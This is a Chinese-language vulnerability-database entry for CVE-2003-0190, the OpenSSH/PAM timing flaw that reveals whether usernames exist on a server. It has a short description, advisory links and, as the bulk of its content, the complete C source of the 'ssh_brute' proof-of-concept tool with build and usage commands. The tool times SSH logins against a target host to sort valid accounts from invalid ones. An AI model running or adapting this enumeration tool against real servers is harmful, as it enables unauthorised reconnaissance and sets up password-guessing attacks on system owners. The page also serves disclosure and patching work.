OpenSSH PAM启用验证延迟信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107299 漏洞类型 设计错误
发布时间 2003-04-30 更新时间 2007-05-08
CVE编号 CVE-2003-0190 CNNVD-ID CNNVD-200305-021
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/25
https://www.securityfocus.com/bid/11781
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200305-021
|漏洞详情
OpenSSH是一种开放源码的SSH协议的实现,目前移植在多种系统下工作。移植的OpenSSH版本在支持PAM的情况下存在时序攻击问题,远程攻击者可以利用这个漏洞判断用户是否存在,导致信息泄露。根据测试,如果OpenSSH以--with-pam进行配置的情况下,由于对合法用户和非法用户响应信息的时间不同,该可以判断系统用户是否存在。在判断用户情况下,可以进一步通过猜测密码进行攻击。
|漏洞EXP
/*
* SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
* Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
*
*
* Vulnerability discovered by Marco Ivaldi <raptor@mediaservice.net>
* Proof of concept code by Maurizio Agazzini <inode@mediaservice.net>
*
* Tested against Red Hat, Mandrake, and Debian GNU/Linux.
*
* Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
*
* $ tar xvfz openssh-3.6.1p1.tar.gz
* $ patch -p0 <openssh-3.6.1p1_brute.diff 
* patching file openssh-3.6.1p1/ssh.c
* patching file openssh-3.6.1p1/sshconnect.c
* patching file openssh-3.6.1p1/sshconnect1.c
* patching file openssh-3.6.1p1/sshconnect2.c
* $ cd openssh-3.6.1p1
* $ ./configure
* $ make
* $ cc ../ssh_brute.c -o ssh_brute
* $ ./ssh_brute 1 list.txt 192.168.0.66
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>

/* an illegal user */
#define NO_USER "not_val_user"

/* path of the patched ssh */
#define PATH_SSH "./ssh"

/* max time range for invalid user */
#define TIME_RANGE 3 

int main(int argc, char *argv[])
{
FILE * in;
char buffer[2000], username[100], *host;
int time_non_valid = 0, time_user = 0; 
int version = 1, i = 0, ret;

fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n");
fprintf(stderr, " Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved\n"); 

if (argc < 3) {
fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]);
exit(-1);
}

version = atoi(argv[1]);
host = argv[3];

if ( ( in = fopen(argv[2], "r") ) == NULL ) {
fprintf(stderr, "\n Can't open %s\n", argv[2]);
exit(-1);
}

/* test an illegal user */
printf("\n Testing an illegal user\t: ");
fflush(stdout);

sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, NO_USER, host);

for (i = 0; i < 3; i++) {
ret = system(buffer);
time_non_valid += WEXITSTATUS(ret);
}

time_non_valid /= 3;

printf("%d second(s)\n\n", time_non_valid);

time_non_valid += TIME_RANGE;

/* test supplied users */
fscanf(in, "%s", username);

while ( !feof(in) ) {

printf(" Testing login %s\t", username);

if (strlen(username) <= 8)
printf("\t");
printf(": ");

fflush( stdout );

sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, username, host);
ret = system(buffer);
time_user = WEXITSTATUS(ret);

if (time_user <= time_non_valid) 
printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)]\n", time_user);
else {
/* valid user? test it again to be sure */

ret = system(buffer);
time_user = WEXITSTATUS(ret);

if (time_user <= time_non_valid)
printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)] [2 test]\n", time_user);
else
printf("\E[32m\E[1mUSER OK\E[m\t[%d second(s)]\n", time_user);
}

fscanf(in, "%s", username);
}

fclose(in);

printf("\n");

exit(0);
}



// milw0rm.com [2003-04-30]
|受影响的产品
SuSE Linux Enterprise Server 9 S.u.S.E. Linux Personal 9.2 x86_64 S.u.S.E. Linux Personal 9.2 S.u.S.E. Linux Personal 9.0 x86_64 S.u.S.E. Linux Personal 9.0 OpenSSH OpenSSH
|参考资料

来源:BID
名称:7467
链接:http://www.securityfocus.com/bid/7467
来源:BUGTRAQ
名称:20030430OpenSSH/PAMtimingattackallowsremoteusersidentification
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105172058404810&w=2
来源:TURBO
名称:TLSA-2003-31
链接:http://www.turbolinux.com/security/TLSA-2003-31.txt
来源:REDHAT
名称:RHSA-2003:224
链接:http://www.redhat.com/support/errata/RHSA-2003-224.html
来源:REDHAT
名称:RHSA-2003:222
链接:http://www.redhat.com/support/errata/RHSA-2003-222.html
来源:BUGTRAQ
名称:20030806[OpenPKG-SA-2003.035]OpenPKGSecurityAdvisory(openssh)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106018677302607&w=2
来源:BUGTRAQ
名称:20030430OpenSSH/PAMtimingattackallowsremoteusersidentification
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105172058404810&w=2
来源:FULLDISC
名称:20030430OpenSSH/PAMtimingattackallowsremoteusersidentification
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2003-April/004815.html
来源:lab.mediaservice.net
链接:http://lab.mediaservice.net/advisory/2003-01-openssh.txt
来源:USGovernmentResource:ova